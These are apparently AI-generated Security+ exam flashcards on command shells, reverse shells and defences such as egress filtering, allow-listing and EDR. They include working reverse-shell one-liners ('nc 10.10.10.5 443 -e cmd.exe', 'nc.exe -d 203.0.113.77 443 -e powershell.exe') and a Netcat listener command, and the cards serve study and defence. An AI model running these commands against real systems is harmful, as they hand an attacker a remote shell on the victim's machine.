cybersec+ shells

Of course. Here is a set of flashcards focusing specifically on the key terms from the study material.

Flashcards: Key Terms

Front:

Reverse Shell

Back:

A remote shell session initiated from the victim's computer back to the attacker's listening server. This technique helps bypass firewalls by making the connection appear as legitimate outbound traffic.

Front:

Listener

Back:

A program or command an attacker runs on their own server to wait for an incoming connection from a victim's payload, typically to catch a reverse shell (e.g., nc -lvp 443).

Front:

Payload / Stager

Back:

The malicious code or script executed on a victim's machine that initiates the connection back to the attacker's listener to establish a remote shell.

Front:

Netcat (nc)

Back:

A versatile command-line networking utility used to read from and write to network connections. It is a common tool for creating listeners and executing reverse shell payloads.

Front:

Egress Filtering

Back:

A network security control that restricts or blocks outbound traffic leaving an internal network. It's a key defense against reverse shells by preventing connections to unauthorized external ports and IP addresses.

Front:

Application Allow-listing

Back:

A security policy that explicitly defines which programs are allowed to run on a system. Any application not on the list is blocked, preventing the execution of unauthorized tools like nc.exe.

Front:

PowerShell

Back:

An advanced, object-oriented command-line shell and scripting language for Windows. It is heavily used in system administration and security for automation and management.

Front:

cron

Back:

A time-based job scheduler in Unix-like operating systems. It is used to automate and schedule the execution of scripts or commands at specific intervals, which can be used to maintain persistence for a backdoor.

Front:

Metasploit Framework

Back:

A popular open-source penetration testing framework used to discover, exploit, and validate vulnerabilities. It includes numerous tools for generating reverse shell payloads.

Front:

Cobalt Strike

Back:

A commercial threat emulation software platform used by red teams for advanced adversary simulations. It is a powerful command-and-control (C2) framework known for its sophisticated reverse shell capabilities.

Front:

Stateful Firewall

Back:

A firewall that tracks the state of active network connections. Because it automatically allows return traffic for connections initiated from inside the network, it can be bypassed by a reverse shell.

Front:

EDR / NGAV

Back:

Endpoint Detection and Response / Next-Generation Antivirus. Advanced endpoint security solutions that use behavioral analysis, memory scanning, and script-blocking to identify and stop threats like fileless malware and reverse shells.

Of course. Here are the flashcards based on the provided notes for the CompTIA Security+ (SY0-701) exam.

Set 1: Key Concepts

Front:

What are common command-line environments (“shells”) you should know for Security+?

Back:

* Windows CMD: The traditional command-line interpreter.

* PowerShell: A more powerful, object-oriented shell for Windows.

* Linux Shells: Such as bash (most common) and zsh.

* Python Interactive Shell: For running Python commands and scripts.

Front:

For Security+, why is scripting in shells considered a crucial skill?

Back:

Scripting allows you to automate security tasks. Any command you can type can be put into a script and scheduled (using Task Scheduler or cron). This is essential for tasks like forcing updates, gathering inventories, rotating logs, and pulling indicators of compromise.

Front:

What is a reverse shell?

Back:

A remote shell session that is initiated from the victim's computer back to the attacker's machine. This technique is often used to bypass firewalls, as the outbound connection can be disguised as normal network traffic (e.g., on TCP port 443 for HTTPS).

Front:

What are some common tools used to create and manage reverse shells?

Back:

* Netcat (nc): A versatile networking utility.

* Metasploit Framework: A comprehensive penetration testing tool.

* Cobalt Strike: A popular command-and-control (C2) framework.

* Custom Python/Go executables: Often used by adversaries to evade detection.

Front:

What are the primary security implications of a reverse shell on a network?

Back:

A reverse shell can serve as a persistent backdoor or foothold for an Advanced Persistent Threat (APT). This allows an attacker to re-enter the network at will, create rogue user accounts, pivot to other internal systems, and exfiltrate sensitive data.

Set 2: Technical Details & Defense

Front:

In a reverse shell scenario, what is the difference between the "listener" and the "payload"?

Back:

* Listener: The attacker sets this up on their own machine to "listen" for an incoming connection on a specific port (e.g., nc -lvp 443).

* Payload/Stager: This is the malicious code run on the victim's machine that initiates the connection back to the attacker's listener.

Front:

What is the Netcat (nc) command to make a Windows victim connect to an attacker at 10.10.10.5 on port 443 and send a command shell?

Back:

nc 10.10.10.5 443 -e cmd.exe

Front:

Name at least three mitigating controls to defend against reverse shells.

Back:

* EDR/NGAV: Endpoint protection that can perform script-block and memory scanning.

* Egress Filtering: Restricting which outbound ports and destinations internal hosts can connect to.

* Application Allow-listing: Preventing unauthorized executables (like nc.exe) from running.

* PowerShell Constrained Language Mode: Restricting dangerous cmdlets and commands.

Front:

Which PowerShell cmdlet is used to view the list of running processes on a Windows host?

Back:

Get-Process

Set 3: Exam Practice

Front:

Question: Why do attackers often use TCP port 443 for their reverse shell traffic?

Back:

To blend in with normal HTTPS traffic, making the malicious connection harder for firewalls and security analysts to detect.

Front:

Question: An analyst sees the process nc.exe -d 203.0.113.77 443 -e powershell.exe running on a host. Which preventive control would have been most effective at stopping this?

Back:

Application Allow-listing (e.g., AppLocker), because it would have prevented the unauthorized nc.exe program from executing in the first place.

Front:

PBQ Scenario: You suspect a malicious Python script (pyrev.py) is maintaining a reverse shell on a Linux server. What is a three-step process (with commands) to handle this threat?

Back:

* Identify Process: Find the Process ID (PID) of the script.

  * ps aux | grep pyrev.py

* Confirm Connection: Verify it has an outbound network connection.

  * lsof -Pan -p <PID> -i

  * or: ss -pnen | grep <PID>

* Kill & Remove: Terminate the process and remove the malicious file.

  * kill -9 <PID>

  * rm /path/to/pyrev.py